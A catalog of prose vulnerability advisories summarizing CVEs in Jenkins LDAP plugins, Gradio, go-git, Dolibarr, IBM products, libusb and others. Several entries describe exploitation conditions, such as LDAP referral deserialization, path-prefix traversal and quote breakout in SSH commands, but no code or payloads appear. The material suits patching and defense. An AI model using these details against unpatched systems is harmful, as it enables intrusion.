CVE Catalog

A vulnerability in the Jenkins Active Directory Plugin, specifically in versions through 2.41, allows for remote code execution due to unvalidated LDAP referrals. By default, the plugin follows LDAP referrals from the configured Active Directory server, which can be manipulated to forward to an RMI URL. This exploitation causes Jenkins to deserialize attacker-controlled data, potentially leading to remote code execution on the Jenkins controller if certain deserialization 'gadgets' are available. The vulnerability can be exploited by attackers who control the LDAP server or who can perform a man-in-the-middle attack.

A deserialization vulnerability has been identified in the Jenkins LDAP Plugin, specifically in versions through 807.v7d7de30930cf. The vulnerability arises because the plugin deserializes data from LDAP referrals without proper validation. This issue can lead to remote code execution on the Jenkins controller, especially if deserialization 'gadgets' are available on the classpath. The vulnerability can be exploited by attackers who control the configured LDAP server or who can perform a man-in-the-middle attack.

A remote code execution vulnerability exists in the Jenkins LDAP Plugin in versions through 807.v7d7de30930cf. The plugin follows LDAP referrals from the configured LDAP server, which can be manipulated to forward to an RMI URL. This behavior allows for the deserialization of attacker-controlled data, potentially leading to remote code execution on the Jenkins controller, provided that certain deserialization 'gadgets' are available on the classpath. Exploitation requires control over the LDAP server or the ability to perform a man-in-the-middle attack.

A cookie injection vulnerability has been identified in Gradio versions prior to 6.15.0. This vulnerability allows remote attackers to perform cross-space session fixation by exploiting a shared module-level HTTP client used across all users in the reverse proxy endpoint. Attackers controlling any Hugging Face Space can inject a parent-domain cookie that is stored by the shared client and automatically included in subsequent proxy requests to other legitimate Spaces, affecting all users of the same Gradio deployment.

A path traversal vulnerability has been identified in Taipy version 4.1.1, specifically within the ElementLibrary.get_resource() method. This vulnerability allows unauthenticated attackers to escape the designated module directory by taking advantage of an inadequate path containment check. The flaw arises from using str.startswith() for comparison without a trailing path separator, enabling attackers to craft GET requests that include path traversal segments. These requests can target a sibling directory on the disk that matches the prefix, bypassing the directory containment check. The issue is exacerbated by Flask's path converter and Werkzeug's WSGI layer, which preserve the traversal segments, allowing unauthorized access to files outside the intended library directory.

A stored cross-site scripting vulnerability has been identified in Agent Zero versions prior to 1.15. This vulnerability allows attackers to execute arbitrary JavaScript in the application origin by uploading crafted SVG files through the image_get API endpoint. The absence of proper headers, such as Content-Security-Policy, X-Content-Type-Options, and Content-Disposition, facilitates this attack. Exploitation involves luring an authenticated user to the image_get endpoint, where the malicious script can execute, potentially stealing the csrf_token cookie and performing unauthorized API calls on behalf of the user.

A path traversal vulnerability has been identified in Agent Zero versions prior to 1.15. This vulnerability allows unauthenticated attackers to read arbitrary files by sending crafted paths to the image file serving endpoint. The endpoint only checks file extensions against an allowlist, while the path containment verification is disabled. As a result, attackers can access any file with an image extension that the Agent Zero process can read, including files outside the application workspace, in user home directories, or on mounted volumes. The vulnerability also allows for symlink-based escapes due to inadequate path canonicalization in the path resolution process.

A path validation vulnerability has been identified in the go-git library, which is a Git implementation written in Go. This issue affects versions of go-git prior to 5.19.1 and 6.0.0-alpha.4. The vulnerability allows crafted repository data to interfere with files outside the designated checkout area, including the repository's .git directory. This problem arises from go-git's deviation from upstream Git's validation checks, which had been established years earlier. Exploitation of this vulnerability requires a maliciously crafted repository payload, and some attack vectors are specific to certain platforms: Windows, macOS, or across all supported platforms.

A vulnerability exists in go-git's SSH transport in versions prior to 5.19.1 and 6.0.0-alpha.4. The issue arises because the SSH transport constructs the remote exec command by wrapping the repository path in single quotes, but fails to properly escape single quotes embedded within the path. This flaw allows a repository path containing a single quote to break out of the quoted region and be appended as additional shell tokens. On SSH servers that evaluate the exec command through a shell, these extra tokens could execute in the context of the user's command execution environment. The vulnerability has been addressed in go-git versions 5.19.1 and 6.0.0-alpha.4.

A vulnerability exists in go-git, a Git implementation library in Go, prior to versions 5.19.0 and 6.0.0-alpha.3. The issue arises from go-git’s handling of malformed Git objects, particularly in commit or tag headers, which can lead to a decoded representation that differs from upstream Git's interpretation. This discrepancy can cause problems in commit signing and verification, as go-git may process a commit payload that is not an exact byte-for-byte match with the original object in the repository. Consequently, a signature might be incorrectly validated for a commit whose metadata does not accurately reflect the intended signed object.

A vulnerability in LibVNCClient versions through 0.9.15 allows for out-of-bounds writes due to improper handling of Tight encoding rectangles in the Gradient filter. The decoder uses fixed-size buffers for the Gradient filter but fails to reject rectangles wider than 2048 pixels. This oversight enables a malicious VNC server to send crafted FramebufferUpdate rectangles that exploit the buffer size limitation, leading to memory corruption.

A vulnerability exists in GuardDog, a command-line interface tool for identifying malicious PyPI packages, versions 2.6.0 through 2.9.0. The issue arises because the tool's default human-readable output includes filenames, file locations, messages, and code snippets controlled by attackers, without properly escaping terminal control characters. This oversight allows malicious packages to inject ANSI or OSC escape sequences into the terminals of analysts or into continuous integration logs.

A server-side request forgery (SSRF) vulnerability has been identified in GuardDog, a command-line tool for detecting malicious PyPI packages. This issue affects versions 1.0.0 through 2.9.0. The vulnerability arises because the tool's remote project scanning feature blindly rewrites repository URLs controlled by attackers. It then sends the modified request along with the user's GitHub credentials, specifically the GH_TOKEN, via HTTP Basic Authentication. As a result, an attacker who can manipulate the scanned URL could intercept the GitHub token and potentially access sensitive information or perform actions on behalf of the user.

A denial-of-service vulnerability has been identified in the OpenTelemetry JavaScript Client, specifically in versions prior to 0.217.0 of the Prometheus exporter. The issue arises because the metrics endpoint, which listens on 0.0.0.0:9464 by default, lacks proper error handling for URL parsing. As a result, a single malformed HTTP request can cause an uncaught TypeError that crashes any Node.js process using this exporter. This vulnerability is particularly concerning because the metrics endpoint is unauthenticated and accessible by any network client that can reach the metrics port.

A cross-site scripting (XSS) vulnerability has been identified in RabbitMQ's management UI, specifically in versions 3.7.0 prior to 4.1.2 and 4.0.13. The issue arises from unsanitized virtual host names that can be exploited if an attacker manages to force a virtual host to restart. This vulnerability allows for the injection of malicious scripts into the management UI pages that list virtual hosts.

An authentication bypass vulnerability has been identified in Nocturne Memory versions prior to 2.4.1. When the API_TOKEN is unset or empty, the BearerTokenAuthMiddleware allows unauthorized access to all HTTP requests. This issue is compounded by the default host binding of 0.0.0.0 and permissive CORS settings, which together expose the full Knowledge-Graph read/write API to any client on the same local network. As a result, an attacker can read, write, or delete all memory entries, including critical system URIs that could enable persistent prompt-injection in downstream agent sessions.

A vulnerability exists in the Auth0.js SDK, specifically in versions 8.11.0 prior to 9.32.0. Under certain conditions, the SDK may incorrectly disclose user profile information by using a valid access token in conjunction with a specially crafted invalid ID token. This issue arises in applications that depend on access control rules defined in Auth0 Actions.

A vulnerability exists in Tauri versions 2.0 through 2.11.0, where the 'is_local_url()' function incorrectly identifies remote URLs as trusted local origins on Windows and Android. This misclassification allows remote pages to invoke local-only inter-process communication (IPC) commands. The issue arises because Tauri's origin check only evaluates the first subdomain, enabling attackers to exploit custom URI schemes by hosting pages on matching subdomains. The vulnerability is patched in Tauri version 2.11.1.

A vulnerability allowing remote code execution has been identified in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4, as well as in version 24.0.0-alpha under certain conditions. The issue arises from the 'dol_eval()' function, which is a wrapper around PHP's 'eval()' and is used to evaluate dynamic expressions throughout the application. In the affected versions, an administrator can inject PHP code into specific database fields, which is then executed when the application processes those fields. This vulnerability can be exploited by chaining it with another vulnerability in the same application that allows execution of operating system commands.

A remote code execution vulnerability has been identified in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4, as well as in version 24.0.0-alpha. The issue arises from the cron job scheduler, where user-controlled input is passed directly to PHP's call_user_func_array() function without proper validation. This vulnerability allows an authenticated attacker to execute arbitrary code on the server.

A vulnerability allowing remote code execution has been identified in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4, as well as in version 24.0.0-alpha under certain conditions. The issue arises from the use of the 'dol_eval()' function, which is a wrapper around PHP's 'eval()' that evaluates dynamic expressions. This vulnerability is present in the 'htdocs/core/actions_addupdatedelete.inc.php' file, where user-controlled input can be injected into the 'perms' attribute of extrafields. An administrator can exploit this by storing a PHP expression in the database, which is then executed when the corresponding business object is updated or fetched.

A missing authorization vulnerability has been identified in Craft CMS versions through 5.9.5. This vulnerability exists in the migrate endpoint of the application.

A Cross-Site Request Forgery (CSRF) vulnerability exists in the delete.php endpoint of Jason2605 AdminPanel version 4.0 and prior. This vulnerability allows an attacker to perform file deletion actions on behalf of an authenticated user without their consent. The issue arises from a lack of CSRF protections, as the endpoint does not validate the origin of requests or require a CSRF token, and it exposes sensitive actions through GET requests.

An information disclosure vulnerability has been identified in IBM Business Automation Workflow, both in containerized and traditional deployments. This vulnerability may leak details about the application's database structure through error messages. It affects versions 24.0.0, 24.0.1, 25.0.0, and 25.0.1.

A heap buffer overflow vulnerability has been identified in libjxl version 0.12.0. The issue arises in the jxl::extras::DecodeImagePNM function within the PNM decoding component. When the library processes specially crafted PBM images, it fails to properly validate buffer sizes before executing memory copy operations. This oversight allows the memcpy function to write 24 bytes into a buffer that can only accommodate 16 bytes, leading to memory corruption.

A vulnerability in Keycloak allows an authenticated user with low privileges to escalate rights by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. Tokens exceeding 4000 characters are silently discarded, causing the system to revert to client credentials. This switch grants the user access to the permissions of the client's service account, facilitating unauthorized privilege escalation.

A vulnerability in PostgreSQL Anonymizer allows users to gain superuser privileges by creating a table and inserting malicious code into a column identifier. When a superuser invokes the k-anonymity function, the embedded code is executed with elevated privileges. This issue is more pronounced in PostgreSQL 14 or in instances upgraded from PostgreSQL 14 or earlier. In PostgreSQL 15 and later, the default revocation of creation permissions in the public schema limits this exploit to users explicitly granted the CREATE TABLE privilege.

A potential arbitrary file read vulnerability has been identified in the asperahttpd component of IBM Aspera High-Speed Transfer Endpoint and IBM Aspera High-Speed Transfer Server, both versions 3.7.4 prior to 4.4.7 Fix Pack 1. This vulnerability allows an authenticated user to access files in the server's local storage that they should not have permission to.

A vulnerability exists in the 'Long Term Retention' (LTR) add-on feature of IBM Guardium Data Protection versions 12.2.1 and 12.2.2. When debug mode is enabled, this feature can inadvertently expose sensitive credentials.

A denial-of-service vulnerability has been identified in the asperahttpd component of IBM Aspera High-Speed Transfer Endpoint and IBM Aspera High-Speed Transfer Server, both versions 3.7.4 prior to 4.4.7 Fix Pack 1. An unauthenticated user can cause the asperahttpd service to crash, leading to a service disruption.

A buffer overflow vulnerability has been identified in the asperahttpd component of IBM Aspera High-Speed Transfer Endpoint and IBM Aspera High-Speed Transfer Server, both versions 3.7.4 prior to 4.4.7 Fix Pack 1. This vulnerability could enable an authenticated user to execute arbitrary code on the system.

A buffer overflow vulnerability has been identified in the asperahttpd component of IBM Aspera High-Speed Transfer Endpoint and IBM Aspera High-Speed Transfer Server, both versions 3.7.4 prior to 4.4.7 Fix Pack 1. This vulnerability could be exploited to cause a denial of service and potentially lead to authentication bypass or remote code execution.

An authentication bypass vulnerability has been identified in IBM Aspera High-Speed Transfer Server for Cloud Pak for Integration (CP4I) versions 1.5.1 through 1.5.19. This vulnerability allows a transfer client to access files in the server's local storage that should be restricted, potentially leading to unauthorized file access.

A denial-of-service vulnerability has been identified in IBM Langflow OSS versions 1.0.0 through 1.9.0. This issue arises from uncontrolled resource consumption, allowing unauthenticated users to upload an unlimited number of files via the deprecated /api/v1/upload/{flow_id} endpoint. The lack of authentication and validation enables potential disk space exhaustion and information disclosure through absolute file path leakage in API responses.

A remote code execution vulnerability exists in IBM Langflow OSS versions 1.0.0 through 1.9.1. The issue arises from improper validation of symbolic links during the extraction of tar archives, allowing attackers to exploit symlinks to access arbitrary files on the file system. In scenarios where users can upload documents, a crafted tar file could be used to link to sensitive files, such as Langflow OSS' JWT secret key. Once these files are processed and stored in the vector database, the attacker could retrieve sensitive information through chatbot queries, potentially leading to authentication bypass and remote code execution via the Python Interpreter node.

A vulnerability exists in IBM Operations Analytics - Log Analysis and IBM SmartCloud Analytics - Log Analysis due to the use of default passwords from the manufacturing process, which are not required to be changed after installation. This flaw could enable an attacker to bypass authentication. The vulnerability affects versions 1.3.2.0, 1.3.3.0, 1.3.5.0, 1.3.5.1, 1.3.5.2, 1.3.5.3, 1.3.6.0, 1.3.6.1, 1.3.6.2, 1.3.7.0, 1.3.7.1, 1.3.7.2, 1.3.8.0, 1.3.8.1, 1.3.8.2, 1.3.8.3, and 1.3.8.4 on Linux.

A denial-of-service vulnerability has been identified in IBM OpenBMC versions FW1110.00 through FW1110.11. This vulnerability allows unauthenticated network users to disrupt the BMC's HTTPS service, leading to a denial-of-service condition.

An authorization bypass vulnerability has been identified in IBM Db2 versions 12.1.0 through 12.1.4. This vulnerability occurs when uploading to a remote object storage path using a specific query, allowing unauthorized actions to be performed.

A denial-of-service vulnerability has been identified in IBM i versions 7.6, 7.5, 7.4, and 7.3. This issue arises from uncontrolled recursion in the Integrated Language Environment (ILE) compiler. An authenticated attacker could exploit this vulnerability by compiling specially crafted source code that includes a specific combination of statements.

A denial-of-service vulnerability has been identified in IBM Db2 versions 11.5.0 through 11.5.9 and 12.1.0 through 12.1.4. The issue arises when a specially crafted query is executed on range partitioned tables, leading to a service disruption.

A denial-of-service vulnerability has been identified in IBM Db2 versions 11.5.0 prior to 11.5.9 and 12.1.0 prior to 12.1.4. The issue arises when certain queries involving Multi-Dimensional Clustering (MDC) tables are executed, leading to excessive memory consumption and potential application crashes.

A denial-of-service vulnerability has been identified in IBM Db2 versions 11.5.0 through 11.5.9 and 12.1.0 through 12.1.4. The issue arises when a specially crafted query is executed using a small statement heap, leading to uncontrolled resource consumption.

A security bypass vulnerability has been identified in IBM WebSphere Application Server Liberty versions 22.0.0.11 prior to 26.0.0.5. This vulnerability could allow a remote attacker to bypass security measures under certain conditions by exploiting a specific timing window. The issue arises when the appSecurity-3.0, appSecurity-4.0, or appSecurity-5.0 features are enabled.

A vulnerability exists in IBM App Connect Enterprise versions 13.0.1.0 through 13.0.7.0, where potentially sensitive information is logged in files that could be accessed by a local user. This issue affects users of WS-Security with Java 17.

A vulnerability exists in IBM Controller versions 11.0.1, 11.1.0, 11.1.1, and 11.1.2 due to hard-coded credentials, such as passwords or cryptographic keys, used for inbound authentication, outbound communication with external components, or encryption of internal data. This vulnerability could potentially be exploited to bypass authentication or access sensitive information.

A denial-of-service vulnerability has been identified in IBM WebSphere Application Server - Liberty versions 19.0.0.7 prior to 26.0.0.5, as well as in IBM WebSphere Application Server versions 9.0 and 8.5. This vulnerability allows remote attackers to send specially-crafted requests that cause the server to consume excessive memory resources, potentially leading to service disruption.

A local file inclusion vulnerability has been identified in the SeedProd Pro WordPress plugin, affecting versions prior to 6.19.5. This vulnerability arises from improper control of filenames in include or require statements, allowing PHP remote file inclusion.

A broken access control vulnerability has been identified in the WebToffee Product Import Export for WooCommerce plugin, affecting versions through 2.5.6. This vulnerability arises from missing authorization checks, which could allow an unprivileged user to perform actions reserved for higher privileges.

A one-byte out-of-bounds read vulnerability has been identified in libusb versions prior to 1.0.30. The issue arises in the parse_iad_array() function within descriptor.c, where the vulnerability allows attackers to cause a denial-of-service condition. This is achieved by sending a malformed USB descriptor with a bLength value that is one byte less than the total size, which disrupts the bounds checking process. In virtualized environments with USB passthrough, crafted descriptors can be delivered through libusb_get_active_interface_association_descriptors or libusb_get_interface_association_descriptors. This exploitation reads one byte beyond the allocated memory, leading to a denial-of-service situation.

A vulnerability in the Linux kernel's USB driver management for UCAN devices can lead to memory leaks. This issue arises because the lifetime of resources managed by the driver is tied to the parent USB device instead of the USB interface. As a result, when drivers are unbound without the devices being physically disconnected, it can cause unmanaged memory to accumulate. The vulnerability has been addressed by modifying the control message buffer's lifetime management, ensuring it is properly released when the driver is unbound.